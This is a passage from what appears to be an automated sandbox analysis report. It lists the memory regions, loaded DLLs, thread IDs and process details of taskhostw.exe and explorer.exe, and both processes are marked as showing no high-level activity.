| actxprxy.dll | 0x7ff8df640000 | 0x7ff8dfaa9fff | Memory Mapped File | rwx |
|
|
|
- |
| coreuicomponents.dll | 0x7ff8dfab0000 | 0x7ff8dfd10fff | Memory Mapped File | rwx |
|
|
|
- |
| userdatatypehelperutil.dll | 0x7ff8e1050000 | 0x7ff8e1060fff | Memory Mapped File | rwx |
|
|
|
- |
| dsclient.dll | 0x7ff8e1650000 | 0x7ff8e165bfff | Memory Mapped File | rwx |
|
|
|
- |
| clipboardserver.dll | 0x7ff8e1660000 | 0x7ff8e168ffff | Memory Mapped File | rwx |
|
|
|
- |
| windows.shell.servicehostbuilder.dll | 0x7ff8e16c0000 | 0x7ff8e16d1fff | Memory Mapped File | rwx |
|
|
|
- |
| desktopshellext.dll | 0x7ff8e16e0000 | 0x7ff8e16f6fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ff8e3c30000 | 0x7ff8e3fa5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp110_win.dll | 0x7ff8e60a0000 | 0x7ff8e6131fff | Memory Mapped File | rwx |
|
|
|
- |
| policymanager.dll | 0x7ff8e6140000 | 0x7ff8e6178fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ff8e6330000 | 0x7ff8e6365fff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ff8e7430000 | 0x7ff8e7560fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrproxy.dll | 0x7ff8e7570000 | 0x7ff8e75adfff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ff8e79b0000 | 0x7ff8e7b32fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ff8e7b40000 | 0x7ff8e7bb1fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ff8e7d10000 | 0x7ff8e7d1ffff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7ff8e8fb0000 | 0x7ff8e8fd1fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ff8e9060000 | 0x7ff8e9127fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ff8e9680000 | 0x7ff8e9715fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ff8e9720000 | 0x7ff8e9746fff | Memory Mapped File | rwx |
|
|
|
- |
| twinapi.appcore.dll | 0x7ff8e9860000 | 0x7ff8e994dfff | Memory Mapped File | rwx |
|
|
|
- |
| rmclient.dll | 0x7ff8e99e0000 | 0x7ff8e9a07fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ff8ea000000 | 0x7ff8ea00bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ff8ea0f0000 | 0x7ff8ea121fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ff8ea360000 | 0x7ff8ea37efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ff8eadb0000 | 0x7ff8eadc0fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ff8eaf60000 | 0x7ff8eafa3fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ff8eafb0000 | 0x7ff8eb170fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ff8eb180000 | 0x7ff8eb7a7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ff8ec300000 | 0x7ff8ec440fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ff8edfe0000 | 0x7ff8ee030fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #78: taskhostw.exe
0
0
| Information | Value |
|---|---|
| ID | #78 |
| File Name | c:\windows\system32\taskhostw.exe |
| Command Line | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7ac |
| Parent PID | 0x330 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B2C
0x
BD0
0x
AC4
0x
ABC
0x
A10
0x
9DC
0x
9C8
0x
9C4
0x
7B8
0x
7B0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000013be5e0000 | 0x13be5e0000 | 0x13be5effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000013be5f0000 | 0x13be5f0000 | 0x13be5f6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000013be600000 | 0x13be600000 | 0x13be613fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000013be620000 | 0x13be620000 | 0x13be69ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000013be6a0000 | 0x13be6a0000 | 0x13be6a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000013be6b0000 | 0x13be6b0000 | 0x13be6b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000013be6c0000 | 0x13be6c0000 | 0x13be6c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000013be6d0000 | 0x13be6d0000 | 0x13be6d6fff | Private Memory | rw |
|
|
|
- |
| taskhostw.exe.mui | 0x13be6e0000 | 0x13be6e0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000013be6f0000 | 0x13be6f0000 | 0x13be7effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x13be7f0000 | 0x13be8adfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000013be8b0000 | 0x13be8b0000 | 0x13be8bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x13be8c0000 | 0x13be8cffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13be8d0000 | 0x13be8dffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13be8e0000 | 0x13be8effff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13be8f0000 | 0x13be8fffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13be900000 | 0x13be90ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13be910000 | 0x13be91ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13be920000 | 0x13be92ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000013be930000 | 0x13be930000 | 0x13be9affff | Private Memory | rw |
|
|
|
- |
| private_0x00000013be9b0000 | 0x13be9b0000 | 0x13be9b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000013be9c0000 | 0x13be9c0000 | 0x13be9c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000013be9d0000 | 0x13be9d0000 | 0x13be9d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000013be9e0000 | 0x13be9e0000 | 0x13be9effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000013be9f0000 | 0x13be9f0000 | 0x13beaa7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000013beab0000 | 0x13beab0000 | 0x13beab0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000013beac0000 | 0x13beac0000 | 0x13beac0fff | Pagefile Backed Memory | r |
|
|
|
- |
| msctfmonitor.dll.mui | 0x13bead0000 | 0x13bead0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000013beae0000 | 0x13beae0000 | 0x13beae0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000013beaf0000 | 0x13beaf0000 | 0x13beafffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000013beb00000 | 0x13beb00000 | 0x13bec87fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000013bec90000 | 0x13bec90000 | 0x13bee10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000013bee20000 | 0x13bee20000 | 0x13c021ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000013c0220000 | 0x13c0220000 | 0x13c029ffff | Private Memory | rw |
|
|
|
- |
| winmm.dll.mui | 0x13c02a0000 | 0x13c02a5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000013c02b0000 | 0x13c02b0000 | 0x13c02b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c02c0000 | 0x13c02c0000 | 0x13c02c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c02d0000 | 0x13c02d0000 | 0x13c02d7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c02e0000 | 0x13c02e0000 | 0x13c02e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c02f0000 | 0x13c02f0000 | 0x13c02f0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c0300000 | 0x13c0300000 | 0x13c0303fff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c0310000 | 0x13c0310000 | 0x13c0311fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0320000 | 0x13c0320000 | 0x13c0320fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0330000 | 0x13c0330000 | 0x13c033ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0340000 | 0x13c0340000 | 0x13c034ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0350000 | 0x13c0350000 | 0x13c035ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0360000 | 0x13c0360000 | 0x13c036ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0370000 | 0x13c0370000 | 0x13c037ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0380000 | 0x13c0380000 | 0x13c038ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000013c0390000 | 0x13c0390000 | 0x13c0390fff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x13c03a0000 | 0x13c06d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000013c06e0000 | 0x13c06e0000 | 0x13c075ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c0760000 | 0x13c0760000 | 0x13c07dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c07e0000 | 0x13c07e0000 | 0x13c085ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c0860000 | 0x13c0860000 | 0x13c08dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c08e0000 | 0x13c08e0000 | 0x13c08e6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c08f0000 | 0x13c08f0000 | 0x13c09effff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c09f0000 | 0x13c09f0000 | 0x13c0a6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0a70000 | 0x13c0a70000 | 0x13c0a7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0a80000 | 0x13c0a80000 | 0x13c0a8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0a90000 | 0x13c0a90000 | 0x13c0a9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0aa0000 | 0x13c0aa0000 | 0x13c0aaffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0ab0000 | 0x13c0ab0000 | 0x13c0abffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000013c0ac0000 | 0x13c0ac0000 | 0x13c0acffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000013c0ad0000 | 0x13c0ad0000 | 0x13c1acffff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c1ad0000 | 0x13c1ad0000 | 0x13c1b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c1b60000 | 0x13c1b60000 | 0x13c5b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c5b60000 | 0x13c5b60000 | 0x13c9b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c9b60000 | 0x13c9b60000 | 0x13c9b67fff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x13c9b70000 | 0x13c9b7ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9b80000 | 0x13c9b8ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9b90000 | 0x13c9b9ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9ba0000 | 0x13c9baffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9bb0000 | 0x13c9bbffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9bc0000 | 0x13c9bcffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9bd0000 | 0x13c9bdffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9be0000 | 0x13c9beffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9bf0000 | 0x13c9bfffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9c00000 | 0x13c9c0ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9c10000 | 0x13c9c1ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9c20000 | 0x13c9c2ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9c30000 | 0x13c9c3ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9c40000 | 0x13c9c4ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9c50000 | 0x13c9c5ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9c60000 | 0x13c9c6ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000013c9c70000 | 0x13c9c70000 | 0x13c9ceffff | Private Memory | rw |
|
|
|
- |
| private_0x00000013c9cf0000 | 0x13c9cf0000 | 0x13c9cf7fff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x13c9d00000 | 0x13c9d0ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9d10000 | 0x13c9d1ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9d20000 | 0x13c9d2ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9d30000 | 0x13c9d3ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9d40000 | 0x13c9d4ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9d50000 | 0x13c9d5ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000013c9d60000 | 0x13c9d60000 | 0x13c9d67fff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x13c9d70000 | 0x13c9d7ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9d80000 | 0x13c9d8ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000013c9d90000 | 0x13c9d90000 | 0x13c9d9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x13c9da0000 | 0x13c9daffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9db0000 | 0x13c9dbffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9dc0000 | 0x13c9dcffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9dd0000 | 0x13c9ddffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9de0000 | 0x13c9deffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000013c9df0000 | 0x13c9df0000 | 0x13c9e6ffff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x13c9e70000 | 0x13c9e7ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000013c9e80000 | 0x13c9e80000 | 0x13c9e8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x13c9e90000 | 0x13c9e9ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9ea0000 | 0x13c9eaffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9eb0000 | 0x13c9ebffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9ec0000 | 0x13c9ecffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9ed0000 | 0x13c9edffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9ee0000 | 0x13c9eeffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9ef0000 | 0x13c9efffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9f00000 | 0x13c9f0ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13c9f10000 | 0x13c9f1ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000013c9f20000 | 0x13c9f20000 | 0x13ca01ffff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x13ca020000 | 0x13ca02ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca030000 | 0x13ca03ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca040000 | 0x13ca04ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca050000 | 0x13ca05ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca060000 | 0x13ca06ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca070000 | 0x13ca07ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca080000 | 0x13ca08ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca090000 | 0x13ca09ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca0a0000 | 0x13ca0affff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca0b0000 | 0x13ca0bffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca0c0000 | 0x13ca0cffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca0d0000 | 0x13ca0dffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca0e0000 | 0x13ca0effff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca0f0000 | 0x13ca0fffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca100000 | 0x13ca10ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca110000 | 0x13ca11ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca120000 | 0x13ca12ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000013ca130000 | 0x13ca130000 | 0x13ca137fff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x13ca140000 | 0x13ca14ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca150000 | 0x13ca15ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca160000 | 0x13ca16ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca170000 | 0x13ca17ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca180000 | 0x13ca18ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca190000 | 0x13ca19ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca1a0000 | 0x13ca1affff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca1b0000 | 0x13ca1bffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca1c0000 | 0x13ca1cffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x13ca1e0000 | 0x13ca1effff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff9d0000 | 0x7df5ff9d0000 | 0x7ff5ff9cffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7f6524000 | 0x7ff7f6524000 | 0x7ff7f6525fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7f6526000 | 0x7ff7f6526000 | 0x7ff7f6527fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7f6528000 | 0x7ff7f6528000 | 0x7ff7f6529fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7f652a000 | 0x7ff7f652a000 | 0x7ff7f652bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7f652c000 | 0x7ff7f652c000 | 0x7ff7f652dfff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 49 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #79: explorer.exe
0
0
| Information | Value |
|---|---|
| ID | #79 |
| File Name | c:\windows\explorer.exe |
| Command Line | C:\Windows\Explorer.EXE |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x508 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
908
0x
960
0x
7C8
0x
7E8
0x
95C
0x
974
0x
46C
0x
BE0
0x
BDC
0x
A98
0x
A94
0x
A18
0x
970
0x
964
0x
958
0x
950
0x
94C
0x
948
0x
940
0x
938
0x
930
0x
92C
0x
8FC
0x
8F8
0x
8F4
0x
8F0
0x
8C0
0x
8A4
0x
878
0x
86C
0x
84C
0x
848
0x
844
0x
840
0x
830
0x
82C
0x
810
0x
80C
0x
808
0x
804
0x
5BC
0x
478
0x
5B4
0x
65C
0x
5E8
0x
55C
0x
B5C
0x
D4C
0x
AB0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000dc0000 | 0x00dc0000 | 0x00dcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000dd0000 | 0x00dd0000 | 0x00dd6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x00df3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e00000 | 0x00e00000 | 0x00e7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e80000 | 0x00e80000 | 0x00e83fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e90000 | 0x00e90000 | 0x00e92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ea0000 | 0x00ea0000 | 0x00ea1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00eb0000 | 0x00f6dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00f72fff | Private Memory | rw |
|
|
|
- |
| acrobat reader dc.lnk | 0x00f80000 | 0x00f80fff | Memory Mapped File | r |
|
|
|
|
| google chrome.lnk | 0x00f80000 | 0x00f80fff | Memory Mapped File | r |
|
|
|
|
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000037.db | 0x00f80000 | 0x00f9bfff | Memory Mapped File | r |
|
|
|
|
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000037.db | 0x00fa0000 | 0x00fbbfff | Memory Mapped File | rw |
|
|
|
|
| mozilla firefox.lnk | 0x00fa0000 | 0x00fa0fff | Memory Mapped File | r |
|
|
|
|
| private_0x0000000000ff0000 | 0x00ff0000 | 0x00ff6fff | Private Memory | rw |
|
|
|
- |
| explorer.exe.mui | 0x01000000 | 0x01007fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001010000 | 0x01010000 | 0x01010fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001020000 | 0x01020000 | 0x01020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001030000 | 0x01030000 | 0x01030fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001040000 | 0x01040000 | 0x01040fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x01050fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001060000 | 0x01060000 | 0x01060fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x01070000 | 0x01073fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x01080000 | 0x01092fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000010a0000 | 0x010a0000 | 0x0119ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000011a0000 | 0x011a0000 | 0x011a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| thumbcache_idx.db | 0x011b0000 | 0x011b1fff | Memory Mapped File | rw |
|
|
|
- |
| iconcache_idx.db | 0x011c0000 | 0x011c1fff | Memory Mapped File | rw |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000034.db | 0x01230000 | 0x0124dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001250000 | 0x01250000 | 0x01252fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001260000 | 0x01260000 | 0x0126ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001270000 | 0x01270000 | 0x01272fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001280000 | 0x01280000 | 0x012a9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000012b0000 | 0x012b0000 | 0x012b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000012c0000 | 0x012c0000 | 0x012cffff | Private Memory | rw |
|
|
|
- |
